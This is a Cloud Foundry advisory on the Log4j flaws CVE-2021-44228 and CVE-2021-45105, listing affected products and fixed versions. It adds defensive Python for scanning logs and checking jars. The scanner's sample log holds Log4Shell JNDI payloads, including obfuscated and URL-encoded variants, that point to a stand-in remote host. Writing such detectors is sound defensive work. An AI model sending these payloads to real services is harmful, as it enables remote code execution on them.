Cloud Foundry advisory CFOUNDRY:690C01663F820378948F8CF2E2405F72
Dec 12, 2021 - 12:00 a.m.

Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45105) impact on Cloud Foundry Products | Cloud Foundry

Source: Cloud Foundry, www.cloudfoundry.org, 2021-12-12 00:00:00

CVSS3: 10 (High)
Attack Vector: NETWORK | Attack Complexity: LOW | Privileges Required: NONE | User Interaction: NONE | Scope: CHANGED | Confidentiality Impact: HIGH | Integrity Impact: HIGH | Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS2: 9.3 (High)
Access Vector: NETWORK | Access Complexity: MEDIUM | Authentication: NONE | Confidentiality Impact: COMPLETE | Integrity Impact: COMPLETE | Availability Impact: COMPLETE
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

EPSS: 0.976 (High), percentile 100.0%

Severity: Critical

Vendor: Cloud Foundry Foundation

Description

A critical vulnerability in Apache Log4j, identified by CVE-2021-44228, has been publicly disclosed. Log4j versions prior to 2.15.0 evaluate JNDI lookups (for example ${jndi:ldap://...}) embedded in logged data, so an unauthenticated attacker who can get such a string into a log message can trigger remote code execution in impacted Cloud Foundry products.

This is an ongoing event; check this advisory frequently for updates as they develop. The advisory has also been updated to cover CVE-2021-45105, a denial-of-service issue (uncontrolled recursion in self-referential lookups) later identified in Log4j versions below 2.17.0.
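The description above says the attack rides on a JNDI lookup string reaching a log message. The following is an added example (not part of the Cloud Foundry advisory or project) of how a responder would sweep existing request logs for such strings. It assumes the common obfuscations of the lookup, which Log4j 2 itself resolves before the JNDI lookup runs: nested ${lower:..} and ${upper:..} lookups, ${prefix:key:-default} fallbacks, and URL encoding in query strings; the sample access-log lines are constructed. Any other lookup prefix is left unresolved, so detection stays conservative rather than guessing.

```python
"""Detect Log4j JNDI lookup payloads (CVE-2021-44228) in log lines.

Added example for this advisory; not Cloud Foundry project code. The sample
access-log lines are constructed. The normaliser undoes the obfuscations that
Log4j 2 itself resolves before the JNDI lookup runs: nested ${lower:..} and
${upper:..} lookups and ${prefix:key:-default} fallbacks. Any other lookup
prefix is left unresolved, so detection stays conservative.
"""
import re
from urllib.parse import unquote

# An innermost lookup: a ${...} whose body contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What we look for once the obfuscation layers are peeled off.
_JNDI = re.compile(r"\$\{jndi:[^\s\"']*", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 20) -> str:
    """Resolve nested lower/upper/default lookups from the inside out.

    Stops when a round changes nothing, i.e. only ${jndi:...} or unknown
    lookups remain. max_rounds bounds the work on hostile input.
    """
    for _ in range(max_rounds):
        changed = False

        def resolve(match):
            nonlocal changed
            body = match.group(1)
            low = body.lower()
            if low.startswith("jndi:"):
                return match.group(0)          # keep the thing we are hunting
            if low.startswith("lower:"):
                changed = True
                return body[len("lower:"):].lower()
            if low.startswith("upper:"):
                changed = True
                return body[len("upper:"):].upper()
            if ":-" in body:
                # ${env:MISSING:-x} and ${::-x} substitute the default 'x';
                # assume the attacker picked a key that does not resolve.
                changed = True
                return body.split(":-", 1)[1]
            return match.group(0)              # unknown lookup, leave as is

        text = _INNER.sub(resolve, text)
        if not changed:
            break
    return text


def scan_log(lines):
    """Return one hit per line that carries a JNDI lookup after URL-decoding
    (two rounds, for double-encoded query strings) and normalisation."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        decoded = line
        for _ in range(2):
            decoded = unquote(decoded)
        normalized = normalize(decoded)
        match = _JNDI.search(normalized)
        if match:
            hits.append({"line": lineno, "payload": match.group(0), "raw": line})
    return hits


# Constructed sample: five access-log lines, three of them carrying a payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:22:14:03 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:22:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:22:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:J}${upper:n}${::-d}${env:NOPE:-i}:ldap://198.51.100.7:1389/b}"',
    '10.0.0.9 - - [10/Dec/2021:22:14:11 +0000] '
    '"GET /?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '10.0.0.12 - - [10/Dec/2021:22:14:15 +0000] "GET /price?currency=${dollar} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['payload']}")
```

Run it against exported router or application logs (one line per entry). A hit only proves that a lookup string arrived, not that it was evaluated; whether the receiving component was vulnerable is what the version table in the Mitigation section answers. The last sample line shows why the scanner does not simply flag every ${...}: unknown lookups are left alone and never matched.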

Affected Cloud Foundry Products and Versions

Severity is critical unless otherwise noted.

  • UAA
  • Credhub
  • Cf-for-k8s
  • Cf-deployment
  • PHP buildpack
  • Java buildpack

Mitigation

Users of affected products are strongly encouraged to follow the mitigations below. The Cloud Foundry project recommends upgrading to the following release versions (which address both of the above CVEs):

  • UAA – upgrade all versions to 75.13.0 or greater
  • Credhub – upgrade all versions to 2.11.0 or greater
  • Cf-for-k8s – upgrade all versions to v5.4.2 or greater
  • Cf-deployment – upgrade all versions to 17.1.0 or greater
  • PHP buildpack – upgrade all versions to 4.4.54 or greater
  • Java buildpack – upgrade all versions to 4.47 or greater
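The release versions above are the fix; what an operator still needs is a way to confirm that the artifact actually running (a UAA or Credhub release job, a Java application droplet) carries a fixed log4j-core, including copies nested inside WARs and fat jars. The following is an added example, not Cloud Foundry project code. It assumes the fixed floor is 2.17.0 (the version this advisory names for CVE-2021-45105; 2.15.0 fixed CVE-2021-44228), and identifies log4j-core by the Maven pom.properties it ships or, for shaded or relocated jars that lack it, by the presence of JndiLookup.class. The sample WAR is constructed in memory. One caveat: the 2.12.x and 2.3.x backport lines for old Java runtimes have their own fixed versions that this advisory does not cover, and a 2.17.0 floor would flag them; treat those separately.

```python
"""Check a Java artifact for a bundled log4j-core below the fixed version.

Added example for this advisory; not Cloud Foundry project code. The sample
WAR is constructed in memory. Assumptions: the fixed floor is 2.17.0 (the
version the advisory names for CVE-2021-45105; 2.15.0 fixed CVE-2021-44228),
and log4j-core is identified by the Maven pom.properties it ships or by the
presence of JndiLookup.class when the jar has been shaded or relocated.
"""
import io
import zipfile

FIXED_FLOOR = (2, 17, 0)
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
NESTED = (".jar", ".war", ".ear", ".zip")


def parse_version(text: str) -> tuple:
    """'2.17.0' -> (2, 17, 0); a trailing qualifier such as '-rc1' is ignored."""
    parts = []
    for piece in text.split(".")[:3]:
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def inspect_jar(data: bytes, path: str = "<root>") -> list:
    """Walk one archive and every archive nested inside it (WEB-INF/lib,
    fat-jar BOOT-INF/lib, ...). One finding per log4j-core copy found."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings                      # not an archive after all; skip
    with zf:
        names = zf.namelist()
        name_set = set(names)
        version = None
        if POM_PROPS in name_set:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        if POM_PROPS in name_set or JNDI_CLASS in name_set:
            findings.append({
                "path": path,
                "version": version,
                # Unknown version is treated as vulnerable: prove the fix, don't assume it.
                "vulnerable": version is None or parse_version(version) < FIXED_FLOOR,
                # Whether the Apache class-removal workaround was applied to this copy.
                "jndi_lookup_present": JNDI_CLASS in name_set,
            })
        for name in sorted(names):
            if name.lower().endswith(NESTED):
                findings.extend(inspect_jar(zf.read(name), f"{path}!/{name}"))
    return findings


def _make_jar(entries: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_sample_war() -> bytes:
    """Constructed sample: a WAR bundling log4j-core 2.14.1 next to an unrelated jar."""
    log4j_core = _make_jar({
        POM_PROPS: "groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion=2.14.1\n",
        JNDI_CLASS: b"\xca\xfe\xba\xbe",     # class-file magic stands in for the real class
    })
    other = _make_jar({"META-INF/MANIFEST.MF": "Manifest-Version: 1.0\n"})
    return _make_jar({
        "WEB-INF/web.xml": "<web-app/>",
        "WEB-INF/lib/log4j-core-2.14.1.jar": log4j_core,
        "WEB-INF/lib/other.jar": other,
    })


def build_fixed_jar() -> bytes:
    """Constructed sample: a log4j-core at the advisory's fixed level (the class still ships)."""
    return _make_jar({
        POM_PROPS: "groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion=2.17.0\n",
        JNDI_CLASS: b"\xca\xfe\xba\xbe",
    })


if __name__ == "__main__":
    for finding in inspect_jar(build_sample_war(), "app.war") + inspect_jar(build_fixed_jar(), "log4j-core.jar"):
        print(finding)
```

Point inspect_jar at the bytes of any jar, WAR or droplet archive pulled from a running instance; the path field uses jar-URL notation (outer!/inner) so a finding can be traced back to the exact nested copy. Note that 2.17.0 still ships JndiLookup.class, so the class being present does not by itself mean a copy is vulnerable; the version is what decides, and a missing version is reported as vulnerable on purpose.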

References:

https://vulners.com/cve/CVE-2021-44228

https://github.com/advisories/GHSA-jfh8-c2jp-5v3q

History

2021-12-13: Initial vulnerability report published.

2021-12-14: Updated with patch details of Cf-for-k8s

2021-12-15: Updated Credhub, UAA and PHP buildpack versions with the latest Log4j 2.16 versions

2021-12-18: Updated Cf-for-k8s, Cf-deployment and Java buildpack versions with the latest Log4j 2.16 versions

2022-01-06: Updated UAA, Java buildpack, PHP buildpack and Cf-for-k8s versions with fixes for CVE-2021-45105.
